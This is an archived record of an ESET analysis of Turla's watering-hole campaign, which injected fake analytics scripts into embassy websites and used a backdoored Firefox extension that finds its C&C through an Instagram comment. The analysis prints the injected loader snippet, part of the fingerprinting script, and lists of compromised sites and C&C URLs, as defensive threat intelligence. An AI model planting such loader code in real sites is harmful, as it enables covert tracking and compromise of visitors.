{ "id": "fa6d412d-f355-46c1-8bf0-8f234df503d3", "created_at": "2026-04-06T00:12:31.287506Z", "updated_at": "2026-04-10T03:37:32.597347Z", "deleted_at": null, "sha1_hash": "dbaa61309a306717ebc147705d25a9f465ecad7c", "title": "Turla’s watering hole campaign: An updated Firefox extension abusing Instagram", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 751733, "plain_text": "Turla’s watering hole campaign: An updated Firefox extension\r\nabusing Instagram\r\nBy Jean-Ian Boutin\r\nArchived: 2026-04-05 13:01:06 UTC\r\nUpdate, 21 June 2017: Due to our misunderstanding of communications with Google, the Firefox extension’s\r\ninfection vector discussed below was wrongly described here on 06 June 2017; this is now corrected.  Apologies\r\nto Google and our readers for the unintentional misrepresentation in our original post.\r\nSome of the tactics used in APT attacks die hard. A good example is provided by Turla’s watering hole campaigns.\r\nTurla, which has been targeting governments, government officials and diplomats for years – see, as an example,\r\nthis recent paper – is still using watering hole techniques to redirect potentially interesting victims to their C\u0026C\r\ninfrastructure. In fact, they have been using them since at least 2014 with very few variations in their modus\r\noperandi.\r\nA watering hole attack compromises websites that are likely to be visited by targets of interest. The people behind\r\nTurla are apparently keen on targeting embassy websites. Indeed, there was a February 2017 blogpost by\r\nForcepoint highlighting some of the websites most recently compromised.\r\nWe, of course, are monitoring the developments of these campaigns closely and recently noticed them reusing a\r\ntechnique that we haven’t seen them use for several months.\r\nInitial compromise\r\nIn the IoCs section below, there is a list of websites that have been used to redirect to Turla watering hole C\u0026Cs in\r\nthe past. As is usual with this group, there are many websites directly related to embassies throughout the world.\r\nThe websites’ visitors will be redirected to a malicious server because of a snippet - inserted by the attacker -\r\nappended to the original page. The scripts we saw in the last few months were all similar to this one:\r\n\u003c!-- Clicky Web Analytics (start) --\u003e\r\n\u003cscript type=\"text/javascript\"\u003e// \u003c![CDATA[\r\nvar clicky_site_ids = clicky_site_ids || [];\r\nclicky_site_ids.push(100673048);\r\n(function() {\r\nvar s = document.createElement('script');\r\nvar a = 'http://www.mentalhealthcheck.net/';\r\nhttps://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/\r\nPage 1 of 8\n\nvar b = 'update/counter.js';\r\ns.type = 'text/javascript'; s.async = true;\r\ns.src = '//static.getclicky.com/js'; s.src = a.concat(b);\r\n( document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(s);\r\n})();\r\n// ]]\u003e\u003c/script\u003e\r\nThe attackers added a reference to Clicky, a real time web analytics framework. They are adding this framework\r\nname in an attempt to legitimize the appended script to cursory, or non-expert, examination, although it is not\r\nactually used in the attack. We can see here that this injected script calls another script at\r\nmentalhealthcheck.net/update/counter.js. This is a server the Turla gang has been using to push fingerprinting\r\nscripts – scripts that will gather information about the system it is running on – to interesting victims. A deceptive\r\nreference to the Google Analytics script was used in a similar fashion for a while, but now Clicky is what we see\r\nthe most. You can find in the IoCs section the various watering hole C\u0026Cs that we saw in the last couple of\r\nmonths. All of these C\u0026Cs are compromised legitimate servers.\r\nThe next step in the attack is to distribute a fingerprinting JavaScript to interesting targets. To do this, the C\u0026C is\r\nfiltering visitors using an IP range. If they are within the targeted IP range, they receive the fingerprinting script. If\r\nnot, they just receive a benign script: a JS implementation of the MD5 hashing algorithm. Below we show an\r\nexcerpt of the deobfuscated script that is received by victims coming from a targeted IP range:\r\nfunction cb_custom() {\r\nloadScript(\"http://www.mentalhealthcheck.net/script/pde.js\", cb_custom1);\r\n}\r\nfunction cb_custom1() {\r\nPluginDetect.getVersion('.');\r\nmyResults['Java']=PluginDetect.getVersion('Java');\r\nmyResults['Flash']=PluginDetect.getVersion('Flash');\r\nmyResults['Shockwave']=PluginDetect.getVersion('Shockwave');\r\nmyResults['AdobeReader']=PluginDetect.getVersion('AdobeReader') || PluginDetect.getVersion('PDFReader');\r\nvar ec = new evercookie();\r\nec.get('thread', getCookie)\r\nhttps://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/\r\nPage 2 of 8\n\nThis javascript will download a JS library called PluginDetect that has the ability to collect information about\r\nplugins installed in the browser. The information collected is then sent to the C\u0026C server.\r\nIt will also try to install an evercookie, or so-called super cookie, that will track the user throughout his browsing,\r\nacross all sites on the internet.\r\nFor those familiar with this group's waterholing techniques, it is clear they are still using their old, publicly known\r\ntried-and-true methods.\r\nFirefox extension\r\nThrough our monitoring of these watering hole campaigns, we happened upon a very interesting sample. Some of\r\nyou may remember the Pacifier APT report by BitDefender describing a spearphishing campaign with a malicious\r\nMicrosoft Word document sent to several institutions worldwide. These malicious documents would then drop a\r\nbackdoor. We now know that this report describes Skipper, a first stage backdoor used by the Turla gang.\r\nThat report also contains a description of a Firefox extension dropped by the same type of malicious document. It\r\nturns out we have found what most likely is an update of this Firefox extension. It is a JavaScript backdoor,\r\ndifferent in terms of implementation to the one described in the Pacifier APT report, but with similar\r\nfunctionalities.\r\nWe noticed that this extension could have been distributed through a forged copy of a Swiss security company's\r\nwebsite. Unsuspecting visitors to this website were asked to install this malicious extension. The extension is a\r\nhttps://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/\r\nPage 3 of 8\n\nsimple backdoor, but with an interesting way of fetching its C\u0026C domain.\r\nThe use of Instagram\r\nThe extension uses a bit.ly URL to reach its C\u0026C, but the URL path is nowhere to be found in the extension code.\r\nIn fact, it will obtain this path by using comments posted on a specific Instagram post. The one that was used in\r\nthe analyzed sample was a comment about a photo posted to the Britney Spears official Instagram account.\r\n© https://www.instagram.com/p/BO8gU41A45g/\r\nThe extension will look at each photo’s comment and will compute a custom hash value. If the hash matches 183,\r\nit will then run this regular expression on the comment in order to obtain the path of the bit.ly URL:\r\n(?:\\\\u200d(?:#|@)(\\\\w)\r\nLooking at the photo’s comments, there was only one for which the hash matches 183. This comment was posted\r\non February 6, while the original photo was posted in early January. Taking the comment and running it through\r\nthe regex, you get the following bit.ly URL:\r\nhttp://bit.ly/2kdhuHX\r\nLooking a bit more closely at the regular expression, we see it is looking for either @|# or the Unicode character\r\n\\200d. This character is actually a non-printable character called 'Zero Width Joiner', normally used to separate\r\nhttps://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/\r\nPage 4 of 8\n\nemojis. Pasting the actual comment or looking at its source, you can see that this character precedes each character\r\nthat makes the path of the bit.ly URL:\r\nsmith2155\u003c200d\u003e#2hot ma\u003c200d\u003eke lovei\u003c200d\u003ed to \u003c200d\u003eher, \u003c200d\u003euupss \u003c200d\u003e#Hot \u003c200d\u003e#X\r\nWhen resolving this shortened link, it leads to static.travelclothes.org/dolR_1ert.php , which was used in the past\r\nas a watering hole C\u0026C by the Turla crew.\r\nAs is the case with all bit.ly links, it is possible to get statistics on who clicked the link.\r\nAs seen above, there were only 17 hits recorded on this link in February, right around the time the comment was\r\nposted. However, this is quite a low number and might indicate that it was only a test run.\r\nTechnical analysis\r\nThis Firefox extension implements a simple backdoor. It will first gather information on the system it is running\r\non and send it to the C\u0026C, encrypted using AES. This is very similar to what the extension described in the\r\nPacifier APT white paper is doing.\r\nThe backdoor component has the ability to run four different types of commands:\r\nexecute arbitrary file\r\nupload file to C\u0026C\r\ndownload file from C\u0026C\r\nhttps://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/\r\nPage 5 of 8\n\nread directory content - send a file listing, along with sizes and dates, to C\u0026C\r\nWhile we believe this to be some type of test, the next version of the extension - if there is one - is likely to be\r\nvery different. There are several APIs that are used by the extension that will disappear in future versions of\r\nFirefox.\r\nFor example, it uses XPCOM to write files to disk and sdk/system/child_process to launch a process. These can\r\nonly be used by add-ons that will be superseded by WebExtensions starting with Firefox 57. From that version\r\nonwards, Firefox will no longer load add-ons, thus preventing the use of these APIs.\r\nConclusion\r\nThe fact that the Turla actors are using social media as a way to obtain its C\u0026C servers is quite interesting. This\r\nbehavior has already been observed in the past by other threat crews such as the Dukes. Attackers using social\r\nmedia to recover a C\u0026C address are making life harder for defenders. Firstly, it is difficult to distinguish\r\nmalicious traffic to social media from legitimate traffic. Secondly, it gives the attackers more flexibility when it\r\ncomes to changing the C\u0026C address as well as erasing all traces of it. It is also interesting to see that they are\r\nrecycling an old way of fingerprinting a victim and finding new ways to make the C\u0026C retrieval a bit more\r\ndifficult.\r\nFor any inquiries, or to make sample submissions related to the subject, contact us at: threatintel@eset.com.\r\nAcknowledgements\r\nWe would like to thank Clement Lecigne from Google’s Threat Analysis Group for his help researching this\r\ncampaign.\r\nIoCs\r\nFirefox extension hash\r\nFile name SHA-1\r\nhtml5.xpi 5ba7532b4c89cc3f7ffe15b6c0e5df82a34c22ea\r\nhtml5.xpi 8e6c9e4582d18dd75162bcbc63e933db344c5680\r\nObserved compromised websites redirecting to fingerprinting servers\r\nAs of this writing all these sites are now clean or pointing to dead fingerprinting servers.\r\nURL Description\r\nhxxp://www.namibianembassyusa.org Namibia Embassy – USA\r\nhxxp://www.avsa.org African Violet Society of America\r\nhttps://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/\r\nPage 6 of 8\n\nURL Description\r\nhxxp://www.zambiaembassy.org Zambian Embassy – USA\r\nhxxp://russianembassy.org Russian Embassy – USA\r\nhxxp://au.int African Union\r\nhxxp://mfa.gov.kg Ministry of Foreign Affairs – Kyrgyzstan\r\nhxxp://mfa.uz Ministry of Foreign Affairs – Uzbekistan\r\nhxxp://www.adesyd.es\r\nADESyD - Asociación de Diplomados Españoles en Seguridad y\r\nDefensa\r\nhxxp://www.bewusstkaufen.at web portal for sustainable consumption in Austria\r\nhxxp://www.cifga.es Cifga Laboratory working on development of marine toxin standards\r\nhxxp://www.jse.org Juventudes Socialistas de España (JSE)\r\nhxxp://www.embassyofindonesia.org Embassy of Indonesia – USA\r\nhxxp://www.mischendorf.at town of Mischendorf – Austria\r\nhxxp://www.vfreiheitliche.at Political party in Bregenz, Austria\r\nhxxp://www.xeneticafontao.com\r\nFontao Genetics, S.A. established in 1998 is responsible for the\r\nmanagement of the Centre for Animal Selection and Reproduction\r\nof Galicia breeds Holstein, Rubia Gallega\r\nhxxp://iraqiembassy.us Embassy of Iraq – USA\r\nhxxp://sai.gov.ua Management of road safety (Ukraine)\r\nhxxp://www.mfa.gov.md Ministry of Foreign Affairs – Moldova\r\nhxxp://mkk.gov.kg State Personnel Service - Kyrgyzstan\r\nCompromised websites used as first stage C\u0026C in watering hole campaigns\r\nhxxp://www.mentalhealthcheck.net/update/counter.js (hxxp://bitly.com/2hlv91v+)\r\nhxxp://www.mentalhealthcheck.net/script/pde.js\r\nhxxp://drivers.epsoncorp.com/plugin/analytics/counter.js\r\nhxxp://rss.nbcpost.com/news/today/content.php\r\nhxxp://static.travelclothes.org/main.js\r\nhxxp://msgcollection.com/templates/nivoslider/loading.php\r\nhxxp://versal.media/?atis=509\r\nhxxp://www.ajepcoin.com/UserFiles/File/init.php (hxxp://bit.ly/2h8Lztj+)\r\nhttps://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/\r\nPage 7 of 8\n\nhxxp://loveandlight.aws3.net/wp-includes/theme-compat/akismet.php\r\nhxxp://alessandrosl.com/core/modules/mailer/mailer.php\r\nSource: https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/\r\nhttps://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/" ], "report_names": [ "turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434351, "ts_updated_at": 1775792252, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/dbaa61309a306717ebc147705d25a9f465ecad7c.pdf", "text": "https://archive.orkl.eu/dbaa61309a306717ebc147705d25a9f465ecad7c.txt", "img": "https://archive.orkl.eu/dbaa61309a306717ebc147705d25a9f465ecad7c.jpg" } }